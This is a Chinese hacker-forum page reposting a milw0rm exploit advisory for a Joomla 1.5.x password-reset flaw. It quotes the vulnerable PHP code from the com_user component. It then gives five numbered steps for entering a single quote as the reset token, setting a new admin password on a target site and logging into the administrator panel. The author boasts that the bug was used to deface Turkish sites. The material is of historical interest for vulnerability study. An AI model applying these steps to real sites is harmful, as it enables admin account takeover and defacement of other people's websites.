Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

远程管理员改密码脆弱性

★★★

【字体：小大】

Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-8-14

#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Author: d3m0n (d3m0n@o2.pl)                                                       #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################

File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false)   < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130

function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
#####################################################################################

{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "

Example :

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞： ZeeBuddy SQL注入漏洞

下一篇漏洞：远程SQL注入漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913